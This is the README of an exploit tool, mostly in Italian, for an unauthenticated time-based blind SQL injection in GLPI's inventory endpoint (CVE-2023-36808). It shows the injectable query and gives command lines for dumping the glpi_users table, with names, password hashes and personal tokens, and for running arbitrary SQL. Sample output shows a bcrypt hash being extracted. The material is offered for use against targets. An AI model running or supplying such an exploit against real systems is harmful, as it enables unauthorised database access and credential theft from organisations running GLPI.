
GLPI cve-2023-36808
Le versioni GLPI < 10.0.10 espongono un endpoint XML di inventario non autenticato su /front/inventory.php.
Il campo <deviceid> viene iniettato direttamente in una query SQL senza sanitizzazione:
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'
Non è richiesta autenticazione. La vulnerabilità consente l'accesso completo in lettura al database tramite SQL injection blind.
Questo script utilizza iniezione blind basata sul tempo con ricerca binaria per estrarre dati in modo significativamente più veloce rispetto agli strumenti generici.
pip install -r requirements.txt
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi
# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"
# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3
# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep : 0.5s Threshold: 0.35s Parallel: 2
[+] Target reachable
[+] Injection confirmed
[*] User 1/7
name glpi
password $2y$10$xN.12pQxSLlQdMJzP26EWe...
personal_token xxxx
...